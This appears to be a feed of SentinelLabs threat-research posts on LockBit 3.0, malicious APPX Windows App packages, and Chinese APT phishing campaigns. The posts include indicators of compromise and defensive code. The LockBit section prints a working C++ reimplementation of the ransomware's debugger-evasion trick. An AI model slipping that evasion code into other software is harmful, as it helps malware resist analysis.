The images below depict the implementation of the DbgUiRemoteBreakin function before (label 1) and after (label 2) the LockBit 3.0 ransomware has modified the implementation of the function.


The implementation of the DbgUiRemoteBreakin function
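Pieced together from the steps above, the sequence can be sketched in C++ as follows; VirtualProtect stands in for the ZwProtectVirtualMemory trampoline, and resolving SystemFunction040 by loading advapi32.dll is our assumption about how the export might be obtained.

#include <windows.h>

// Resolve DbgUiRemoteBreakin, make its first 32 bytes writable, then encrypt
// them in place with SystemFunction040 (RtlEncryptMemory) so a remote
// break-in thread crashes instead of breaking into the process.
typedef LONG(WINAPI* SystemFunction040_t)(PVOID, ULONG, ULONG);

void ScrambleDbgUiRemoteBreakin()
{
    BYTE* target = (BYTE*)GetProcAddress(GetModuleHandleW(L"ntdll.dll"),
                                         "DbgUiRemoteBreakin");
    HMODULE advapi = LoadLibraryW(L"advapi32.dll");
    if (!target || !advapi)
        return;
    auto encryptMemory = (SystemFunction040_t)GetProcAddress(advapi, "SystemFunction040");
    if (!encryptMemory)
        return;

    DWORD oldProtect = 0;
    if (!VirtualProtect(target, 32, PAGE_EXECUTE_READWRITE, &oldProtect))
        return;
    encryptMemory(target, 32, 0);   // 0: key is valid only within this process
    VirtualProtect(target, 32, oldProtect, &oldProtect);
}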

Conclusion

LockBit has fast become one of the more prolific ransomware-as-a-service operators out there, taking over from Conti after the latter’s fractious fallout in the wake of the Russian invasion of Ukraine.

LockBit’s developers have shown that they are quick to respond to problems in the product they are offering and that they have the technical know-how to keep evolving. The recent claim to be offering a ‘bug bounty’, whatever its true merits, displays a savvy understanding of their own audience and the media landscape that surrounds the present tide of crimeware and enterprise breaches.

Short of intervention by law enforcement, we expect to see LockBit around for the foreseeable future and further iterations of what is undoubtedly a very successful RaaS operation. As with all ransomware, prevention is better than cure, and defenders are encouraged to ensure that they have comprehensive ransomware protection in place. SentinelLabs will continue to offer updates and reports on LockBit activity as it develops.

Indicators of Compromise

SHA256
f9b9d45339db9164a3861bf61758b7f41e6bcfb5bc93404e296e2918e52ccc10
a56b41a6023f828cccaaef470874571d169fdb8f683a75edd430fbd31a2c3f6e
d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee

SHA1
ced1c9fabfe7e187dd809e77c9ca28ea2e165fa8
371353e9564c58ae4722a03205ac84ab34383d8c
c2a321b6078acfab582a195c3eaf3fe05e095ce0

.ONION domains
lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead[.]onion
lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd[.]onion
lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd[.]onion
lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd[.]onion
lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd[.]onion
lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd[.]onion
lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid[.]onion
lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd[.]onion
lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd[.]onion
lockbit7z2jwcskxpbokpemdxmltipntwlkmidcll2qirbu7ykg46eyd[.]onion
lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd[.]onion
lockbitsupdwon76nzykzblcplixwts4n4zoecugz2bxabtapqvmzqqd[.]onion
lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd[.]onion
lockbitsupo7vv5vcl3jxpsdviopwvasljqcstym6efhh6oze7c6xjad[.]onion
lockbitsupq3g62dni2f36snrdb4n5qzqvovbtkt5xffw3draxk6gwqd[.]onion
lockbitsupqfyacidr6upt6nhhyipujvaablubuevxj6xy3frthvr3yd[.]onion
lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd[.]onion
lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd[.]onion
lockbitsupxcjntihbmat4rrh7ktowips2qzywh6zer5r3xafhviyhqd[.]onion

MITRE ATT&CK
T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1543.003 – Create or Modify System Process: Windows Service
T1055 – Process Injection
T1070.001 – Indicator Removal on Host: Clear Windows Event Logs
T1622 – Debugger Evasion
T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
T1485 – Data Destruction
T1489 – Service Stop
T1490 – Inhibit System Recovery
T1003.001 – OS Credential Dumping: LSASS Memory
T1078.002 – Valid Accounts: Domain Accounts
T1078.001 – Valid Accounts: Default Accounts
T1027.002 – Obfuscated Files or Information: Software Packing
T1218.003 – System Binary Proxy Execution: CMSTP
T1047 – Windows Management Instrumentation
T1119 – Automated Collection

Inside Malicious Windows Apps for Malware Deployment

By: Aleksandar Milenkoski

This article discusses Windows Apps – Windows applications packaged into APPX or MSIX packages – as a medium to deploy malware. Though not as widely abused as other infection vectors, there have been a number of recent high-profile attacks that use Windows Apps.

  • November, 2021: BazarBackdoor was distributed in the form of an APPX package.
  • December, 2021: Emotet malware was distributed by abusing a spoofing vulnerability in the Windows App Installer, software that installs Windows Apps.
  • January, 2022:  Malicious Windows Apps in APPX format masquerading as critical browser updates were used to drop Magniber ransomware.
  • February, 2022: Windows Apps laced with the Electron Bot malware were uploaded to the Microsoft Store, a trusted library of Microsoft-certified packaged Windows Apps.

Since Microsoft’s announcement that Office applications will by default disable the execution of Office macros in the context of documents that originate from untrusted sources, there has been an uptick in malicious actors using alternative mediums for deploying malware such as Windows Apps and Windows shortcut LNK files. Despite Microsoft recently rolling back the decision to disable by default Office macro execution, these media complement malicious macros and remain a threat to watch for.

Previous research on malicious Windows Apps focused on concrete system infections involving particular instances of such Apps. This article complements previous research by taking a generic perspective. I take an APPX package that malicious actors have used to deploy malware as a running example and provide:

  • A summarizing overview of the layout and content of APPX packages (APPX packages are structurally very similar to the alternative MSIX packages and the two Windows App packaging formats share the same deployment infrastructure).
  • An overview of selected activities that the Windows system conducts when a user installs a malicious APPX package.

This enables a better understanding of what occurs on a system when a user falls prey to an attack that involves a malicious Windows App – from the operating system activities at first user interaction with the file to the malware deployment that the file triggers.

For Windows to install an APPX package, whether malicious or not, the system first has to establish trust in the package. Microsoft provides the Microsoft Store to Windows users as a library of certified packaged Windows Apps. These packages are digitally counter-signed by Microsoft. Windows trusts by default APPX packages that originate from the Microsoft Store. However, when the Windows App sideloading feature is enabled, users can also install APPX packages that do not originate from the Microsoft Store, that is, packages that are not counter-signed by Microsoft. The majority of the malicious APPX packages that the security community has observed in attacks are of this kind.

In this article, we will dig into how malicious APPX packages can be installed on a Windows 10 system, with a focus on how Windows establishes trust in an APPX package. I focus on this aspect since trust is a crucial part of the Windows App installation process. This process is what ultimately deploys malware on a system. I will use the malicious APPX package edge_update.appx (SHA1: e491af786b5ee3c57920b79460da351ccf8f6f6b) as a running example.

What Does a Malicious Windows App Look Like?

The edge_update.appx APPX package is signed with a code signing certificate issued to Foresee Consulting Inc. and chains to a root certificate issued by DigiCert Trusted Root G4. Windows systems trust DigiCert root certificates, which are placed in the Trusted Root Certification Authorities certificate store.

Figure 1 depicts the certificate chain of the digital signature of edge_update.appx before a Certificate Authority revoked the certificate.

Figure 1: The certificate chain of the digital signature of edge_update.appx prior to certificate revocation

APPX packages are ZIP archive files that store the executable files that implement the packaged Windows App and additional files. Figure 2 depicts the content of edge_update.appx. The eediwjus directory stores the malicious Windows App that the executable files eediwjus.exe and eediwjus.dll implement. eediwjus.exe is a .NET Windows App (see Figure 3) that invokes the mhjpfzvitta function from eediwjus.dll. This function executes malicious code that is heavily control-flow obfuscated with unconditional jumps (see Figure 4). The analysis of the malicious code is out of the scope of this article.

Figure 2: The content of edge_update.appx
Figure 3: The implementation of eediwjus.exe
Figure 4: Control-flow obfuscated malicious code in eediwjus.dll

In addition to the files that implement a Windows App, an APPX package stores additional files, such as AppxManifest.xml, AppxBlockMap.xml, and AppxSignature.p7x.

AppxManifest.xml is the package manifest, a file in XML (Extensible Markup Language) format that contains the information that Windows needs to deploy, display, and update a Windows App. This includes information about:

  • The publisher of the App, where the publisher is the entity that digitally signs the APPX package and that is responsible for the development and release of the Windows App.
  • Windows App properties, such as display name and logo.
  • Software dependencies and capabilities: The Windows system controls what system resources a Windows App can access with respect to the capabilities that the publisher has assigned to the App. System resources include the Internet, filesystem locations, and networking. In summary, Windows Apps execute in a sandboxed, access-restricted, environment for security reasons.

Figure 5 depicts the content of AppxManifest.xml in the malicious edge_update.appx. The publisher of the Windows App is Foresee Consulting Inc., the display name of the App is Edge Update, and the App has the capabilities internetClient and runFullTrust. The internetClient capability enables the malicious Windows App to download data from the Internet, probably a payload from an attacker-controlled endpoint.

Figure 5: The content of AppxManifest.xml in edge_update.appx (trimmed for brevity)

AppxBlockMap.xml is the package block map, a file in XML format that stores Base-64 encoded hash values of data blocks in the files that an APPX package archives. Windows uses these hashes to verify the data integrity of these files when installing an APPX package, a topic that I discuss further in this article.

Figure 6 depicts the content of AppxBlockMap.xml in the malicious edge_update.appx. The HashMethod XML attribute specifies the hash algorithm for calculating the data block hash values in AppxBlockMap.xml. The File XML element specifies a file in the APPX package and the size of the file. The Block XML element specifies the hash value and the size of a single data block in the file. For example, a data block in eediwjus.exe that is 1304 bytes in size has the SHA-256 hash value of ad4f74c0c3ac37e6f1cf600a96ae203c38341d263dbac0741e602686794c4f5a (in hexadecimal format).

Figure 6: The content of AppxBlockMap.xml in edge_update.appx (trimmed for brevity)
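To make the block-hash comparison concrete, the C++ sketch below computes the SHA-256 digest of a single data block with the Windows CNG API and Base64-encodes it for comparison against the corresponding Block entry in AppxBlockMap.xml; the helper is our own construction for illustration, not code taken from AppxSvc, and error handling is omitted.

#include <windows.h>
#include <bcrypt.h>
#include <wincrypt.h>
#include <string>
#pragma comment(lib, "bcrypt.lib")
#pragma comment(lib, "crypt32.lib")

// Hash one data block and return the Base64 string, as AppxBlockMap.xml stores it.
std::string HashBlockBase64(const BYTE* data, ULONG len)
{
    BCRYPT_ALG_HANDLE alg = nullptr;
    BCRYPT_HASH_HANDLE hash = nullptr;
    BYTE digest[32] = {};          // SHA-256 digest size

    BCryptOpenAlgorithmProvider(&alg, BCRYPT_SHA256_ALGORITHM, nullptr, 0);
    BCryptCreateHash(alg, &hash, nullptr, 0, nullptr, 0, 0);
    BCryptHashData(hash, const_cast<PUCHAR>(data), len, 0);
    BCryptFinishHash(hash, digest, sizeof(digest), 0);
    BCryptDestroyHash(hash);
    BCryptCloseAlgorithmProvider(alg, 0);

    DWORD b64Len = 0;
    CryptBinaryToStringA(digest, sizeof(digest),
                         CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, nullptr, &b64Len);
    std::string b64(b64Len, '\0');
    CryptBinaryToStringA(digest, sizeof(digest),
                         CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, &b64[0], &b64Len);
    b64.resize(b64Len);            // drop the trailing terminator
    return b64;
}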

AppxSignature.p7x is the APPX package signature, a PKCS (Public-Key Cryptography Standards) #7 digital signature data in ASN.1 (Abstract Syntax Notation One) format. AppxSignature.p7x stores signature data, such as the certificate chain of the digital signature and the actual signed data. The signed data includes hashes of files in the APPX package, such as AppxManifest.xml and AppxBlockMap.xml. Figure 7 depicts the formatted content of AppxSignature.p7x in the malicious edge_update.appx.

Figure 7: The content of AppxSignature.p7x in edge_update.appx (trimmed for brevity)

Is a Malicious Windows App Trustworthy?

The AppxSvc service (Appx Deployment Service), which the DLL (dynamic-link library) %SystemRoot%\System32\appxdeploymentserver.dll implements, orchestrates the installation of APPX packages. When a user installs an APPX package, the AppxSvc service verifies the data integrity of the package and verifies that the package satisfies certain trust criteria. Figure 8 depicts a simplified overview of the data integrity verification process that the AppxSvc service conducts.

Figure 8: A simplified overview of the data integrity verification process that the AppxSvc service conducts

In summary, the data integrity verification process consists of the following steps:

  1. The AppxSvc service invokes the WinVerifyTrust function to verify the APPX package signature AppxSignature.p7x, that is, to verify the signed data in AppxSignature.p7x using the certificate chain in AppxSignature.p7x (see Figure 7). The signed data includes hashes of files that the APPX package stores, including AppxBlockMap.xml (see Figure 6). For example, Figure 9 depicts the hash value of AppxBlockMap.xml in the malicious edge_update.appx and the same value in AppxSignature.p7x, the package signature of edge_update.appx.


    Figure 9: The hash value of AppxBlockMap.xml in  the package signature of edge_update.appx

  2. The successful verification of the signed data in AppxSignature.p7x enables the AppxSvc service to verify the data integrity of the files whose hashes are part of the signed data, including AppxBlockMap.xml. The AppxSvc service does this by first computing the SHA-256 hash value of AppxBlockMap.xml and then comparing the computed value with the SHA-256 hash value of AppxBlockMap.xml in the previously verified signed data.
  3. Once the AppxSvc service verifies the data integrity of AppxBlockMap.xml, the service verifies the integrity of the data blocks that AppxBlockMap.xml specifies (see Figure 6). The service does this by first computing the hash values of the data blocks and then comparing the computed values with the Base-64 encoded hash values in AppxBlockMap.xml.

The steps above ensure that the data in an APPX package is credible, with the overall process relying on a successful verification of the signed data in AppxSignature.p7x. However, for Windows to install an APPX package – including a malicious one – the system also has to verify that the package satisfies a set of trust criteria.

Previous research provides more background information on the steps above. This article focuses on the trust criteria that relate to the certificates in AppxSignature.p7x that the AppxSvc service uses to verify the signed data in AppxSignature.p7x.

These certificates represent the root of trust for the data integrity verification of an APPX package and for establishing trust in the package. In addition, compared to other package-internal data structures used for data integrity and trust verification, the certificates are more operationally relevant to end users.

When the AppxSvc service installs the malicious edge_update.appx, the service executes:

  • The CertVerifyCertificateChainPolicy function to validate the certificates in AppxSignature.p7x against the following certificate validation policies: CERT_CHAIN_POLICY_AUTHENTICODE (2), CERT_CHAIN_POLICY_AUTHENTICODE_TS (3), CERT_CHAIN_POLICY_BASE (1), and CERT_CHAIN_POLICY_BASIC_CONSTRAINTS (5). Among other certificate properties, CertVerifyCertificateChainPolicy validates whether the certificates are valid for code signing and whether the root certificate is trusted – present in a certificate store for trusted root certificates, such as Trusted Root Certification Authorities.
  • The CertGetCertificateChain function to check the revocation status of the certificates in AppxSignature.p7x.

If any validation by CertVerifyCertificateChainPolicy or CertGetCertificateChain fails, the AppxSvc service does not establish trust in the APPX package and terminates the installation of edge_update.appx.
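The C++ sketch below strings the two functions together for a single leaf certificate, using the CERT_CHAIN_REVOCATION_CHECK_CHAIN flag and the Authenticode policy mentioned above; how the leaf certificate is extracted from AppxSignature.p7x, and the other validation policies the article lists, are left out for brevity.

#include <windows.h>
#include <wincrypt.h>
#pragma comment(lib, "crypt32.lib")

// Build the chain with full revocation checking, then validate it against the
// Authenticode policy. pCert is assumed to be the leaf certificate from the
// package signature.
bool ChainIsTrustedAndNotRevoked(PCCERT_CONTEXT pCert)
{
    CERT_CHAIN_PARA chainPara = { sizeof(chainPara) };
    PCCERT_CHAIN_CONTEXT chain = nullptr;

    // CERT_CHAIN_REVOCATION_CHECK_CHAIN (0x20000000) checks every certificate
    // in the chain, as seen in Figure 12.
    if (!CertGetCertificateChain(nullptr, pCert, nullptr, nullptr, &chainPara,
                                 CERT_CHAIN_REVOCATION_CHECK_CHAIN, nullptr, &chain))
        return false;

    bool ok = (chain->TrustStatus.dwErrorStatus & CERT_TRUST_IS_REVOKED) == 0;

    if (ok)
    {
        CERT_CHAIN_POLICY_PARA policyPara = { sizeof(policyPara) };
        CERT_CHAIN_POLICY_STATUS policyStatus = { sizeof(policyStatus) };
        if (!CertVerifyCertificateChainPolicy(CERT_CHAIN_POLICY_AUTHENTICODE, chain,
                                              &policyPara, &policyStatus)
            || policyStatus.dwError != 0)
            ok = false;   // untrusted root, not valid for code signing, etc.
    }

    CertFreeCertificateChain(chain);
    return ok;
}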

To demonstrate a failed validation by CertVerifyCertificateChainPolicy, Figure 10 depicts a scenario that I crafted: The AppxSvc service executes CertVerifyCertificateChainPolicy to validate the certificates in the package signature of edge_update.appx against the CERT_CHAIN_POLICY_AUTHENTICODE (2) and CERT_CHAIN_POLICY_BASE (1) certificate validation policies. The CERT_CHAIN_POLICY_BASE policy fails the validation of the certificates due to an untrusted root certificate – the root certificate issued by DigiCert Trusted Root G4 is not present in a certificate store for trusted root certificates. This causes the AppxSvc service to terminate the installation of edge_update.appx.


Figure 10: CertVerifyCertificateChainPolicy fails the validation of the certificates in the package signature of edge_update.appx due to an untrusted root certificate

In practice, CertVerifyCertificateChainPolicy successfully validates the certificates in the package signature of the malicious edge_update.appx. This is because the root certificate, which is issued by DigiCert Trusted Root G4, is present in the Trusted Root Certification Authorities certificate store.

Revoked, or Not, That is the Question

The AppxSvc service executes the CertGetCertificateChain function to check the revocation status of the certificates in the package signature of edge_update.appx, starting from the end certificate in the certificate chain – the one issued to Foresee Consulting Inc. (see Figure 11).

Figure 11: The certificate issued to Foresee Consulting Inc. in the context of the CertGetCertificateChain function (in ASN.1 format)

AppxSvc executes CertGetCertificateChain such that the function verifies the revocation status of all certificates in the certificate chain, including the root certificate – the dwFlags parameter of CertGetCertificateChain has the value of 0x20000000 (CERT_CHAIN_REVOCATION_CHECK_CHAIN, see Figure 12).

Figure 12: CertGetCertificateChain verifies the revocation status of all certificates in the certificate chain

Prior to the revocation of the end certificate issued to Foresee Consulting Inc., CertGetCertificateChain did not indicate an issue with the certificate chain in the package signature of edge_update.appx. This resulted in the AppxSvc service completing the installation of the malicious APPX package and therefore compromising the system. Windows places installed Windows Apps in the %ProgramFiles%\WindowsApps directory (see Figure 13).

Figure 13: The AppxSvc service has completed the installation of the malicious edge_update.appx

After the revocation of the end certificate, CertGetCertificateChain indicates that a certificate in the package signature of edge_update.appx has been revoked by storing the CERT_TRUST_IS_REVOKED (0x00000004) error code in a CERT_TRUST_STATUS structure (see Figure 14). This results in the AppxSvc service terminating the installation of the malicious APPX package with an error (see Figure 15).

Figure 14: CertGetCertificateChain stores the CERT_TRUST_IS_REVOKED (0x00000004) error code in a CERT_TRUST_STATUS structure
Figure 15: The AppxSvc service terminates the installation of the malicious edge_update.appx with an error

Recommendations for Users and Administrators

For Windows to install a Windows App that is packaged, for example, into an APPX package, the system first has to establish trust in the package. To this end, Windows verifies the data integrity of the package based on the package signature and evaluates whether the package satisfies certain trust criteria. Some of the trust criteria that relate to the certificates in the package signature are the following:

  • If Windows App sideloading is not enabled on the system, the APPX package must originate from the Microsoft Store and be therefore counter-signed by Microsoft. App sideloading is not enabled by default on recent Windows versions. However, organizations may enable App sideloading on their managed devices or ask customers to turn App sideloading on in order to enable the deployment of Windows Apps built specifically for internal or customer use. These Windows Apps are known as LOB (line-of-business) Windows Apps.
  • If Windows App sideloading is enabled on the system, the APPX package must be signed such that:
    • The system trusts the root certificate of the certificate chain in the signature – the certificate must be present in a certificate store for trusted root certificates.
    • No certificate in the chain is revoked at package installation time.

The majority of the malicious APPX packages that the security community has observed as part of attacks have satisfied the criteria above.

Recommendations for users and administrators for protecting against attacks that involve malware delivery via malicious Windows Apps include the following:

  • For users:
    • Avoid downloading Windows Apps from the Microsoft Store without thoroughly examining relevant information, such as App vendor details, and number and quality of published user reviews. Be careful about typosquatting attempts – malicious Windows Apps with names that are very similar to legitimate, popular Windows Apps. Typosquatting is popular among malicious actors. Attackers have recently managed to plant malicious Windows Apps in the Microsoft Store. In addition, SentinelLabs has recently investigated typosquatting attacks against the crates.io Rust and the PyPI Python software repositories, referred to as CrateDepression and Pymafka.
    • Stay vigilant against phishing attacks and avoid installing software and software updates from unknown sources. Malicious Windows Apps often come under the disguise of critical software updates.
  • For administrators: Malicious actors often use compromised legitimate code signing material, with end certificates that chain to trusted root certificates, to sign malicious Windows Apps. As this article shows, this enables the installation of the malicious App packages on victim systems. Therefore:
    • Make sure that the systems under your management can verify, in a timely and correct manner, whether a certificate has been revoked. This includes unrestricted access to CRL (Certificate Revocation List) and OCSP (Online Certificate Status Protocol) URLs, and/or up-to-date local CRL and OCSP caches. Certificate revocation is a crucial measure against the malicious Windows App threat.
    • Make sure that the code signing material of your organization is kept secure. This is to prevent malicious actors from distributing malware masquerading as Windows Apps that originate from your organization.

Targets of Interest | Russian Organizations Increasingly Under Attack By Chinese APTs

By: Tom Hegel

Executive Summary

  • SentinelLabs has identified a new cluster of threat activity targeting Russian organizations.
  • We assess with high confidence that the threat actor responsible for the attacks is a Chinese state-sponsored cyber espionage group, as also recently noted by Ukraine CERT (CERT-UA).
  • The attacks use phishing emails to deliver exploit-laden Office documents that drop the group’s RAT of choice, most commonly Bisonal.
  • SentinelLabs has also identified associated activity targeting telecommunication organizations in Pakistan leveraging similar attack techniques.

Overview

On June 22nd 2022, CERT-UA publicly released Alert #4860, which contains a collection of documents built with the Royal Road malicious document builder, themed around Russian government interests. SentinelLabs has conducted further analysis of CERT-UA’s findings and has identified supplemental Chinese threat activity.

China’s recent intelligence objectives against Russia can be observed in multiple campaigns following the invasion of Ukraine, such as Scarab, Mustang Panda, ‘Space Pirates’, and now the findings here. Our analysis indicates this is a separate Chinese campaign, but specific actor attribution is unclear at this time.

While the overlap of publicly reported actor names inevitably muddies the picture, it remains clear that the Chinese intelligence apparatus is targeting a wide range of Russian-linked organizations. Our findings currently offer only an incomplete picture of this threat cluster’s phishing activity, but they serve to provide perspective into an attacker’s ongoing operational objectives and a framework for our ongoing research.

Malicious Documents Targeting Russia

On June 22nd, Ukraine’s CERT-UA reported several RTF documents containing malicious code exploiting one or more vulnerabilities in MS Office. CERT-UA assessed that the documents, “Vnimaniyu.doc”, “17.06.2022_Protokol_MRG_Podgruppa_IB.doc”, and “remarks table 20.06.2022_obraza”, were likely built with the Royal Road builder and dropped the Bisonal backdoor. Royal Road is a malicious document builder used widely by Chinese APT groups, while Bisonal is a backdoor RAT unique to Chinese threat actors.

The CERT-UA advisory followed public reporting by our colleagues from nao_sec and Malwarebytes, who identified some of the first indicators and shared related samples and C2 servers. Building off this initial intelligence, SentinelLabs discovered a further related cluster of activity.

Timeline of Royal Road Malicious Documents

As we have observed over the years, Royal Road documents follow content themes relevant to their targets. Following that practice, it’s reasonable to assume that the targets in this recent cluster of activity are likely Russian government organizations.

One example of this cluster (f599ed4ecb6c61ef2f2692d1a083e3bb040f95e6) is a fake document mimicking a RU-CERT memo on increased phishing attacks.

Malicious document mimicking RU-CERT
Malicious document mimicking RU-CERT (Translated)

Another example is themed around telecommunication organizations (415ce2db3957294d73fa832ed844940735120bae).

Malicious Document – Russia Telecom Theme – “Пояснительная записка к ЗНИ.doc”
Malicious Document – Russia Telecom Theme – “Пояснительная записка к ЗНИ.doc” (Translated)

The example documents shown above both exploit CVE-2018-0798, a remote code execution vulnerability in Microsoft Office, to install the embedded malware.

Attribution to Chinese Threat Groups

The collection of files and infrastructure noted above could be considered related to the Tonto Team APT group (aka “CactusPete”, “Earth Akhlut”), a Chinese threat group that has been reported on for nearly ten years. However, we assess that link with only medium confidence due to the potential for shared attacker resources that could muddy attribution based on the currently available data. Known targets span the globe, with a particular interest in Northeast Asia, including governments, critical infrastructure, and other private businesses.

The attacker continues their long history of Russian targeting; however, the rate of Russian and Russia-relevant targets in recent weeks may indicate increased prioritization.

There are multiple connections of this activity to Chinese threat actors. As noted above, the documents are built with a commonly known malicious document builder used widely by Chinese APT groups, the shared toolkit often referred to as the “Royal Road” or the “8.t” builder.
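As a rough illustration of how defenders can triage documents for this builder, the sketch below searches RTF files for a hex-encoded “8.t” object name. It assumes, per public reporting on the builder, that the dropped object name appears hex-encoded in the RTF objdata stream; the sample directory is hypothetical and the heuristic is intentionally naive.

import binascii
from pathlib import Path

# Hex encodings of the "8.t" object name in ANSI and UTF-16LE form
# (an assumption based on public Royal Road reporting, not on the samples above).
MARKERS = [
    binascii.hexlify(b"8.t"),                     # b"382e74"
    binascii.hexlify("8.t".encode("utf-16-le")),  # b"38002e007400"
]

def looks_like_royal_road(path: Path) -> bool:
    """Very rough heuristic: an RTF header plus a hex-encoded '8.t' object name."""
    data = path.read_bytes()
    if not data.startswith(b"{\\rt"):  # malicious RTFs often carry truncated "{\rtf" headers
        return False
    lowered = data.lower()
    return any(marker in lowered for marker in MARKERS)

for doc in Path("samples").glob("*"):  # hypothetical directory of collected documents
    if doc.is_file() and looks_like_royal_road(doc):
        print("possible Royal Road document:", doc)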

These documents often contain metadata indicating the document creator’s operating system was using simplified Chinese, a trait we observed in our previous analysis of Scarab APT activity.

The malicious documents are generally used for the delivery of custom malware, such as the Bisonal RAT, which as noted by CERT-UA, is unique to Chinese groups, including Tonto Team. Bisonal has a uniquely long history of use and continued development by its creators, such as expanding features for file searching and exfiltration, anti-analysis and detection techniques, and maintaining generally unrestricted system control.

Additionally, the collection of C2 infrastructure associated with these various samples falls under a larger umbrella of known Chinese APT activity.

Related Activity of Interest

It’s also worth noting that there are still ongoing related attacks focused on non-Russian organizations, such as those against Pakistan.

For example, one file uploaded to VirusTotal (91ca78231bcacab0d5e6194041817b96252e65bf) from Pakistan is a May 2022 email message file to the Pakistan Telecommunication Authority, sent from a potentially compromised account in the Cabinet Division of the Pakistani government. This email contains the Royal Road attachment “Please help to Check.doc” (f444ff2386cd3ada204c3224463f4be310e5554a), dropping 85fac143c52e26c22562b0aaa80ffe649640bd29 and beaconing outbound to instructor.giize[.]com (198.13.56[.]122).

Phishing email containing malicious document

Conclusion

We assess with high confidence that the Royal Road-built malicious documents, delivered malware, and associated infrastructure are attributable to Chinese threat actors. Based on our observations, there has been a continued effort by this cluster to target Russian organizations through well-known attack methods: the use of malicious documents exploiting n-day vulnerabilities with lures specifically relevant to Russian organizations. Overall, the objectives of these attacks appear espionage-related, but the broader context remains unavailable from our standpoint of external visibility.

Indicators of Compromise

IOC Description
f599ed4ecb6c61ef2f2692d1a083e3bb040f95e6 6/21/2022 Royal Road Document "Вниманию.doc"
cb8eb16d94fd9242baf90abd1ef1a5510edd2996 6/16/2022 Royal Road Document "Вниманию.doc"
41ebc0b36e3e3f16b0a0565f42b0286dd367a352 6/15/2022 (Estimate) Royal Road Document "Анкетирование Агентства по делам государственной службы.rtf"
2abf70f69a289cc99adb5351444a1bd23fd97384 6/20/2022 Royal Road Document "17.06.2022_Протокол_МРГ_Подгруппа_ИБ.doc"
supportteam.lingrevelat[.]com C2 Domain
upportteam.lingrevelat[.]com C2 Domain for cb8eb16d94fd9242baf90abd1ef1a5510edd2996
2b7975e6b1e9b72e9eb06989e5a8b1f6fd9ce027 6/21/2022 Royal Road Document "О_формировании_проекта_ПНС_2022_файл_отображен.doc"
a501fec38f4aca1a57393b6e39a52807a7f071a4 6/21/2022 Royal Road Document "замечания таблица 20.06.2022.doc"
415ce2db3957294d73fa832ed844940735120bae 6/23/2022 Royal Road Document "Пояснительная записка к ЗНИ.doc"
news.wooordhunts[.]com C2 Domain for 415ce2db3957294d73fa832ed844940735120bae
137.220.176[.]165 IP resolved for C2 domains news.wooordhunts[.]com, supportteam.lingrevelat[.]com, upportteam.lingrevelat[.]com
1c848911e6439c14ecc98f2903fc1aea63479a9f 6/23/2022 Royal Road Document "РЭН 2022.doc"
91ca78231bcacab0d5e6194041817b96252e65bf 5/12/2022 Phishing Email File
f444ff2386cd3ada204c3224463f4be310e5554a 5/12/2022 Royal Road Document "Please help to Check.doc"
instructor.giize[.]com C2 Server for f444ff2386cd3ada204c3224463f4be310e5554a

✇SentinelLabs

Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years

By: Joey Chen

Executive Summary

  • Aoqin Dragon, a threat actor SentinelLabs has been extensively tracking, has operated since 2013 targeting government, education, and telecommunication organizations in Southeast Asia and Australia.
  • Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices.
  • Other techniques the attacker has been observed using include DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection.
  • Based on our analysis of the targets, infrastructure and malware structure of Aoqin Dragon campaigns, we assess with moderate confidence the threat actor is a small Chinese-speaking team with potential association to UNC94 (Mandiant).

Overview

SentinelLabs has uncovered a cluster of activity beginning at least as far back as 2013 and continuing to the present day, primarily targeting organizations in Southeast Asia and Australia. We assess that the threat actor’s primary focus is espionage and relates to targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. We track this activity as ‘Aoqin Dragon’.

The threat actor has a history of using document lures with pornographic themes to infect users and makes heavy use of USB shortcut techniques to spread the malware and infect additional targets. Attacks attributable to Aoqin Dragon typically drop one of two backdoors, Mongall and a modified version of the open source Heyoka project.

Threat Actor Infection Chain

Throughout our analysis of Aoqin Dragon campaigns, we observed a clear evolution in their infection chain and TTPs. We divide their infection strategy into three parts.

  1. Using a document exploit and tricking the user into opening a weaponized Word document to install a backdoor.
  2. Luring users into double-clicking a fake antivirus executable to run malware on the victim’s host.
  3. Forging a fake removable device that lures users into opening the wrong folder and unknowingly installing the malware on their system.

Initial Access via Exploitation of Old and Unpatched Vulnerabilities

From 2012 to 2015, Aoqin Dragon relied heavily on CVE-2012-0158 and CVE-2010-3333 to compromise their targets. In 2014, FireEye published a blog detailing related activity using lure documents themed around the disappearance of Malaysia Airlines Flight MH370 to conduct their attacks. Although these vulnerabilities are very old and patches were available before Aoqin Dragon deployed the exploits, decoy documents abusing such RTF-handling vulnerabilities were very common in that period.

There are three interesting points that we discovered from these decoy documents. First, most decoy content is themed around targets interested in APAC political affairs. Second, the actors made use of lure documents themed around pornographic topics to entice their targets. Third, in many cases, the documents are not specific to one country but rather to the entirety of Southeast Asia.

APAC Themed Lure Document

Pornographic-themed Lure Document

Executables Masked With Fake Icons

